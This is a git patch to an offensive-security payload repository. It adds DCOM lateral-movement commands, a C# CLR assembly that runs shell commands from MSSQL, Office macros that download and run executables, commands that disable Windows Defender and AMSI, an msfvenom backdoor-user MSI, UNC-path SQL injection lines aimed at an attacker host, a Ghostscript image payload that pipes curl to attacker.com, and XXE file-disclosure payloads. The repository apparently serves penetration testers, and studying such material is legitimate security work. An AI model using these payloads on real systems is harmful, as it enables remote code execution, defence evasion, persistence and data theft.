From f6b9d63bf8cbbb9a27be6338cd37725ca93f4eec Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 24 Mar 2021 22:26:23 +0100 Subject: [PATCH] DCOM exploitation and MSSQL CLR --- .../Active Directory Attack.md | 75 ++++++++++++++- .../MSSQL Server - Cheatsheet.md | 96 ++++++++++++++++++- Methodology and Resources/Office - Attacks.md | 37 ++++++- .../Windows - AMSI Bypass.md | 6 ++ .../Windows - Privilege Escalation.md | 18 +++- .../Windows - Using credentials.md | 1 + SQL Injection/MSSQL Injection.md | 16 ++++ SQL Injection/README.md | 10 ++ .../ghostscript_rce_curl.jpg | 6 ++ XXE Injection/README.md | 41 ++++++++ 10 files changed, 296 insertions(+), 10 deletions(-) create mode 100644 Upload Insecure Files/Picture Image Magik/ghostscript_rce_curl.jpg diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index a3e58f8..38337c2 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -66,6 +66,10 @@ - [ReadLAPSPassword](#readlapspassword) - [ReadGMSAPassword](#readgmsapassword) - [ForceChangePassword](#forcechangepassword) + - [DCOM Exploitation](#dcom-exploitation) + - [DCOM via MMC Application Class](#dcom-via-mmc-application-class) + - [DCOM via Excel](#dcom-via-excel) + - [DCOM via ShellExecute](#dcom-via-shellexecute) - [Trust relationship between domains](#trust-relationship-between-domains) - [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking) - [Forest to Forest Compromise - Trust Ticket](#forest-to-forest-compromise---trust-ticket) @@ -199,9 +203,9 @@ use [BloodHound](https://github.com/BloodHoundAD/BloodHound) .\SharpHound.exe -c all -d active.htb -SearchForest .\SharpHound.exe --EncryptZip --ZipFilename export.zip .\SharpHound.exe -c all,GPOLocalGroup -.\SharpHound.exe -c all --LDAPUser --LDAPPass --JSONFolder -.\SharpHound.exe -c all -d active.htb --LDAPUser --LDAPPass --domaincontroller 10.10.10.100 - +.\SharpHound.exe -c all --LdapUsername --LdapPassword --JSONFolder +.\SharpHound.exe -c all -d active.htb --LdapUsername --LdapPassword --domaincontroller 10.10.10.100 +.\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23 # or run the collector on the machine using Powershell # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1 @@ -1091,6 +1095,17 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll' PS > Get-DomainComputer COMPUTER -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime ``` +* LAPSToolkit - https://github.com/leoloobeek/LAPSToolkit + ```powershell + $ Get-LAPSComputers + ComputerName Password Expiration + ------------ -------- ---------- + exmaple.domain.local dbZu7;vGaI)Y6w1L 02/21/2021 22:29:18 + + $ Find-LAPSDelegatedGroups + $ Find-AdmPwdExtendedRights + ``` + * ldapsearch ```powershell ldapsearch -x -h  -D "@" -w  -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd` @@ -1712,6 +1727,58 @@ Set-DomainUserPassword -Identity 'TargetUser' -AccountPassword $NewPassword ``` +### DCOM Exploitation + +> DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer + + +#### DCOM via MMC Application Class + +This COM object (MMC20.Application) allows you to script components of MMC snap-in operations. there is a method named **"ExecuteShellCommand"** under **Document.ActiveView**. + +```ps1 +PS C:\> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.1")) +PS C:\> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\calc.exe",$null,$null,7) +PS C:\> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",$null,"-enc DFDFSFSFSFSFSFSFSDFSFSF < Empire encoded string > ","7") + +# Weaponized example with MSBuild +PS C:\> [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.1")).Document.ActiveView.ExecuteShellCommand("c:\windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",$null,"\\10.10.10.2\webdav\build.xml","7") +``` + +Invoke-MMC20RCE : https://raw.githubusercontent.com/n0tty/powershellery/master/Invoke-MMC20RCE.ps1 + +#### DCOM via Excel + +```ps1 +# Powershell script that injects shellcode into excel.exe via ExecuteExcel4Macro through DCOM +Invoke-Excel4DCOM64.ps1 https://gist.github.com/Philts/85d0f2f0a1cc901d40bbb5b44eb3b4c9 +Invoke-ExShellcode.ps1 https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd4e7e2a + +# Using Excel DDE +PS C:\> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName")) +PS C:\> $excel.DisplayAlerts = $false +PS C:\> $excel.DDEInitiate("cmd", "/c calc.exe") +``` + +#### DCOM via ShellExecute + +```ps1 +$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"10.10.10.1") +$obj = [System.Activator]::CreateInstance($com) +$item = $obj.Item() +$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0) +``` + +#### DCOM via ShellBrowserWindow + +:warning: Windows 10 only, the object doesn't exists in Windows 7 + +```ps1 +$com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',"10.10.10.1") +$obj = [System.Activator]::CreateInstance($com) +$obj.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0) +``` + ### Trust relationship between domains * One-way @@ -2403,3 +2470,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae * [CVE-2020-17049: Kerberos Bronze Bit Attack – Theory - Jake Karnes - December 8th, 2020](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-theory/) * [Kerberos Bronze Bit Attack (CVE-2020-17049) Scenarios to Potentially Compromise Active Directory](https://www.hub.trimarcsecurity.com/post/leveraging-the-kerberos-bronze-bit-attack-cve-2020-17049-scenarios-to-compromise-active-directory) * [GPO Abuse: "You can't see me" - Huy Kha - July 19, 2019](https://pentestmag.com/gpo-abuse-you-cant-see-me/) +* [Lateral movement via dcom: round 2 - enigma0x3 - January 23, 2017](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/) +* [New lateral movement techniques abuse DCOM technology - Philip Tsukerman - Jan 25, 2018](https://www.cybereason.com/blog/dcom-lateral-movement-techniques) \ No newline at end of file diff --git a/Methodology and Resources/MSSQL Server - Cheatsheet.md b/Methodology and Resources/MSSQL Server - Cheatsheet.md index 2b6fa34..f187e21 100644 --- a/Methodology and Resources/MSSQL Server - Cheatsheet.md +++ b/Methodology and Resources/MSSQL Server - Cheatsheet.md @@ -27,6 +27,7 @@ * [Add the extended stored procedure and list extended stored procedures](#add-the-extended-stored-procedure-and-list-extended-stored-procedures) * [CLR Assemblies](#clr-assemblies) * [Execute commands using CLR assembly](#execute-commands-using-clr-assembly) + * [Manually creating a CLR DLL and importing it](#manually-creating-a-clr-dll-and-importing-it) * [OLE Automation](#ole-automation) * [Execute commands using OLE automation procedures](#execute-commands-using-ole-automation-procedures) * [Agent Jobs](#agent-jobs) @@ -217,6 +218,11 @@ Get-SQLStoredProcedureXP -Instance "" -Verbose ## CLR Assemblies +Prerequisites: +* sysadmin privileges +* CREATE ASSEMBLY permission (or) +* ALTER ASSEMBLY permission (or) + ### Execute commands using CLR assembly ```ps1 @@ -225,6 +231,93 @@ or Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "" -Command "powershell -e " -Verbose ``` +### Manually creating a CLR DLL and importing it + +Create a C# DLL file with the following content, with the command : `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\cmd_exec.cs` + +```csharp +using System; +using System.Data; +using System.Data.SqlClient; +using System.Data.SqlTypes; +using Microsoft.SqlServer.Server; +using System.IO; +using System.Diagnostics; +using System.Text; + +public partial class StoredProcedures +{ + [Microsoft.SqlServer.Server.SqlProcedure] + public static void cmd_exec (SqlString execCommand) + { + Process proc = new Process(); + proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe"; + proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value); + proc.StartInfo.UseShellExecute = false; + proc.StartInfo.RedirectStandardOutput = true; + proc.Start(); + + // Create the record and specify the metadata for the columns. + SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000)); + + // Mark the beginning of the result set. + SqlContext.Pipe.SendResultsStart(record); + + // Set values for each column in the row + record.SetString(0, proc.StandardOutput.ReadToEnd().ToString()); + + // Send the row back to the client. + SqlContext.Pipe.SendResultsRow(record); + + // Mark the end of the result set. + SqlContext.Pipe.SendResultsEnd(); + + proc.WaitForExit(); + proc.Close(); + } +}; +``` + +Then follow these instructions: + +1. Enable `show advanced options` on the server + ```sql + sp_configure 'show advanced options',1; + RECONFIGURE + GO + ``` +2. Enable CLR on the server + ```sql + sp_configure 'clr enabled',1 + RECONFIGURE + GO + ``` +3. Import the assembly + ```sql + CREATE ASSEMBLY my_assembly + FROM 'c:\temp\cmd_exec.dll' + WITH PERMISSION_SET = UNSAFE; + ``` +4. Link the assembly to a stored procedure + ```sql + CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec]; + GO + ``` +5. Execute and clean + ```sql + cmd_exec "whoami" + DROP PROCEDURE cmd_exec + DROP ASSEMBLY my_assembly + ``` + +**CREATE ASSEMBLY** will also accept an hexadecimal string representation of a CLR DLL + +```sql +CREATE ASSEMBLY [my_assembly] AUTHORIZATION [dbo] FROM +0x4D5A90000300000004000000F[TRUNCATED] +WITH PERMISSION_SET = UNSAFE +GO +``` ## OLE Automation @@ -436,4 +529,5 @@ SELECT SYSTEM_USER ## References * [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3) -* [PowerUpSQL Cheat Sheet - Scott Sutherland](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet) \ No newline at end of file +* [PowerUpSQL Cheat Sheet - Scott Sutherland](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet) +* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/) \ No newline at end of file diff --git a/Methodology and Resources/Office - Attacks.md b/Methodology and Resources/Office - Attacks.md index f15cc2a..39b8acd 100644 --- a/Methodology and Resources/Office - Attacks.md +++ b/Methodology and Resources/Office - Attacks.md @@ -13,11 +13,12 @@ * [DOCM - C# converted to Office VBA macro](#docm---c-converted-to-office-vba-macro) * [DOCM - VBA Wscript](#docm---vba-wscript) * [DOCM - VBA Shell Execute Comment](#docm---vba-shell-execute-comment) -* [DOCM - VBA Spawning via svchost.exe using Scheduled Task](#docm---vba-spawning-via-svchost-exe-using-scheduled-task) -* [DCOM - WMI COM functions (VBA AMSI)](#docm---wmi-com-functions-vba-amsi) +* [DOCM - VBA Spawning via svchost.exe using Scheduled Task](#docm---vba-spawning-via-svchostexe-using-scheduled-task) +* [DCOM - WMI COM functions (VBA AMSI)](#docm---wmi-com-functions) * [DOCM - winmgmts](#docm---winmgmts) -* [DOCM - Macro Pack - Macro and DDE](#dcom---macro-pack---macro-and-dde) +* [DOCM - Macro Pack - Macro and DDE](#docmxlm---macro-pack---macro-and-dde) * [DOCM - CACTUSTORCH VBA Module](#docm---cactustorch-vba-module) +* [DOCM - MMG with Custom DL + Exec](#docm---mmg-with-custom-dl--exec) * [VBA Obfuscation](#vba-obfuscation) * [VBA Purging](#vba-purging) * [OfficePurge](#officepurge) @@ -221,6 +222,12 @@ Sub Auto_Open() End Sub ``` +```vb +CreateObject("WScript.Shell").Run "calc.exe" +CreateObject("WScript.Shell").Exec "notepad.exe" +``` + + ## DOCM - VBA Shell Execute Comment Set your command payload inside the **Comment** metadata of the document. @@ -271,6 +278,8 @@ Rem powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadst ## DOCM - WMI COM functions +Basic WMI exec (detected by Defender) : `r = GetObject("winmgmts:\\.\root\cimv2:Win32_Process").Create("calc.exe", null, null, intProcessID)` + ```ps1 Sub wmi_exec() strComputer = "." @@ -307,6 +316,11 @@ Sub AutoOpen() End Sub ``` +```ps1 +Const ShellWindows = "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}" +Set SW = GetObject("new:" & ShellWindows).Item() +SW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe", "C:\Windows\System32", Null, 0 +``` ## DOCM/XLM - Macro Pack - Macro and DDE @@ -416,7 +430,7 @@ python MMG.py configs/generic-cmd.json malicious.vba } ``` -```ps1 +```vb Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Public Function DownloadFileA(ByVal URL As String, ByVal DownloadPath As String) As Boolean @@ -443,6 +457,18 @@ Sub Auto_Open() End Sub ``` +## DOCM - ActiveX-based (InkPicture control, Painted event) Autorun macro + +Go to **Developer tab** on ribbon `-> Insert -> More Controls -> Microsoft InkPicture Control` + +```vb +Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle) +Run = Shell("cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile('https:///file.exe','file.exe');Start-Process 'file.exe'", vbNormalFocus) +End Sub +``` + + + ## VBA Obfuscation ```ps1 @@ -619,4 +645,5 @@ E * [WordAMSIBypass - rmdavy](https://github.com/rmdavy/WordAmsiBypass) * [Dechaining macros and evading EDR - Noora Hyvärinen](https://blog.f-secure.com/dechaining-macros-and-evading-edr/) * [Executing macros from docx with remote - RedXORBlueJuly 18, 2018](http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html) -* [One thousand and one ways to copy your shellcode to memory (VBA Macros) - X-C3LL - Feb 18, 2021](https://adepts.of0x.cc/alternatives-copy-shellcode/) \ No newline at end of file +* [One thousand and one ways to copy your shellcode to memory (VBA Macros) - X-C3LL - Feb 18, 2021](https://adepts.of0x.cc/alternatives-copy-shellcode/) +* [Running macros via ActiveX controls - greyhathacker - September 29, 2016](http://www.greyhathacker.net/?p=948) \ No newline at end of file diff --git a/Methodology and Resources/Windows - AMSI Bypass.md b/Methodology and Resources/Windows - AMSI Bypass.md index ff80a25..813206c 100644 --- a/Methodology and Resources/Windows - AMSI Bypass.md +++ b/Methodology and Resources/Windows - AMSI Bypass.md @@ -17,6 +17,7 @@ * [Use Powershell Version 2 - No AMSI Support there](#Using-PowerShell-version-2) * [Nishang all in one](#Nishang-all-in-one) * [Adam Chesters Patch](#Adam-Chester-Patch) +* [AMSI.fail](#amsifail) ## Which Endpoint Protection is Using AMSI @@ -735,6 +736,11 @@ Add-Type -TypeDefinition $Winpatch -Language CSharp [patch]::it() ``` +## AMSI.fail + +> AMSI.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures. - https://amsi.fail/ + + ## References * [S3cur3Th1sSh1t - Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell/blob/master/README.md) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 9d3ee8b..4a51f64 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -254,6 +254,8 @@ Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse ## Antivirus & Detections +Enumerate antivirus on a box with `WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName` + ### Windows Defender ```powershell @@ -263,6 +265,13 @@ PS C:\> Get-MpComputerStatus # disable Real Time Monitoring PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus PS C:\> Set-MpPreference -DisableIOAVProtection $true + +# disable AMSI (set to 0 to enable) +PS C:\> Set-MpPreference -DisableScriptScanning 1 + +# exclude a folder +PS C:\> Add-MpPreference -ExclusionPath "C:\Temp" +PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks" ``` ### AppLocker Enumeration @@ -777,16 +786,23 @@ Check if these registry values are set to "1". ```bat $ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated $ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated + +$ Get-ItemProperty HKLM\Software\Policies\Microsoft\Windows\Installer +$ Get-ItemProperty HKCU\Software\Policies\Microsoft\Windows\Installer ``` Then create an MSI package and install it. ```powershell $ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi +$ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi-nouac -o evil.msi $ msiexec /quiet /qn /i C:\evil.msi ``` -Technique also available in Metasploit : `exploit/windows/local/always_install_elevated` +Technique also available in : +* Metasploit : `exploit/windows/local/always_install_elevated` +* PowerUp.ps1 : `Get-RegistryAlwaysInstallElevated`, `Write-UserAddMSI` + ## EoP - Insecure GUI apps diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 998d47b..5115002 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -202,6 +202,7 @@ PS C:\> wmic /node:target.domain /user:domain\user /password:password process ca ## Psexec.py / Smbexec.py / Wmiexec.py From [Impacket](https://github.com/SecureAuthCorp/impacket) (:warning: renamed to impacket-xxx in Kali) +:warning: `get` / `put` for wmiexec, psexec, smbexec, and dcomexec are changing to `lget` and `lput`. ```powershell root@payload$ git clone https://github.com/CoreSecurity/impacket.git diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index c4edcef..8e75bbd 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -208,6 +208,21 @@ MSSQL supports stacked queries so we can create a variable pointing to our IP ad 1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';-- ``` +```sql +xp_dirtree '\\attackerip\file' +xp_fileexist '\\attackerip\file' +BACKUP LOG [TESTING] TO DISK = '\\attackerip\file' +BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file' +RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file' +RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file' +RESTORE HEADERONLY FROM DISK = '\\attackerip\file' +RESTORE FILELISTONLY FROM DISK = '\\attackerip\file' +RESTORE LABELONLY FROM DISK = '\\attackerip\file' +RESTORE REWINDONLY FROM DISK = '\\attackerip\file' +RESTORE VERIFYONLY FROM DISK = '\\attackerip\file' +``` + + ## MSSQL Make user DBA (DB admin) ```sql @@ -252,3 +267,4 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT * [MSSQL Trusted Links - HackTricks.xyz](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links) * [SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/) * [DAFT: Database Audit Framework & Toolkit - NetSPI](https://github.com/NetSPI/DAFT) +* [SQL Server UNC Path Injection Cheatsheet - nullbind](https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e) \ No newline at end of file diff --git a/SQL Injection/README.md b/SQL Injection/README.md index dfa09e5..43240b8 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -30,6 +30,7 @@ Attempting to manipulate SQL queries may have goals including: * [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy) * [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection) * [General tamper option and tamper's list](#general-tamper-option-and-tampers-list) + * [SQLmap without SQL injection](#sqlmap-without-sql-injection) * [Authentication bypass](#authentication-bypass) * [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1) * [Polyglot injection](#polyglot-injection-multicontext) @@ -200,6 +201,7 @@ sqlmap -u "https://test.com/index.php?id=99" --load-cookie=/media/truecrypt1/TI/ python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- " ``` + ### General tamper option and tamper's list ```powershell @@ -267,6 +269,14 @@ tamper=name_of_the_tamper |versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment | |xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'| +### SQLmap without SQL injection + +You can use SQLmap to access a database via its port instead of a URL. + +```ps1 +sqlmap.py -d "mysql://user:pass@ip/database" --dump-all +``` + ## Authentication bypass ```sql diff --git a/Upload Insecure Files/Picture Image Magik/ghostscript_rce_curl.jpg b/Upload Insecure Files/Picture Image Magik/ghostscript_rce_curl.jpg new file mode 100644 index 0000000..05a276d --- /dev/null +++ b/Upload Insecure Files/Picture Image Magik/ghostscript_rce_curl.jpg @@ -0,0 +1,6 @@ +%!PS +userdict /setpagedevice undef +legal +{ null restore } stopped { pop } if +legal +mark /OutputFile (%pipe%curl http://attacker.com/?a=callback) currentdevice putdeviceprops \ No newline at end of file diff --git a/XXE Injection/README.md b/XXE Injection/README.md index 47eb992..8607304 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -26,6 +26,7 @@ Syntax: `` - [XXE OOB Attack (Yunusov, 2013)](#xxe-oob-attack-yusonov---2013) - [XXE OOB with DTD and PHP filter](#xxe-oob-with-dtd-and-php-filter) - [XXE OOB with Apache Karaf](#xxe-oob-with-apache-karaf) +- [Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents](#windows-local-dtd-and-side-channel-leak-to-disclose-http-responsefile-contents) - [XXE in exotic files](#xxe-in-exotic-files) - [XXE inside SVG](#xxe-inside-svg) - [XXE inside SOAP](#xxe-inside-soap) @@ -250,6 +251,9 @@ i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] ``` + + + ## Exploiting blind XXE to exfiltrate data out-of-band Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack. @@ -372,6 +376,43 @@ Assuming payloads such as the previous return a verbose error. You can start poi [Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md) + +## Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents + +From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79 + +### Disclose local file + +```xml + + + + "> + %eval; + %error; + + %local_dtd; + ]>cacat +``` + +### Disclose HTTP Response: + +```xml + + + + "> + %eval; + %error; + + %local_dtd; + ]>cacat +``` + ## XXE in exotic files ### XXE inside SVG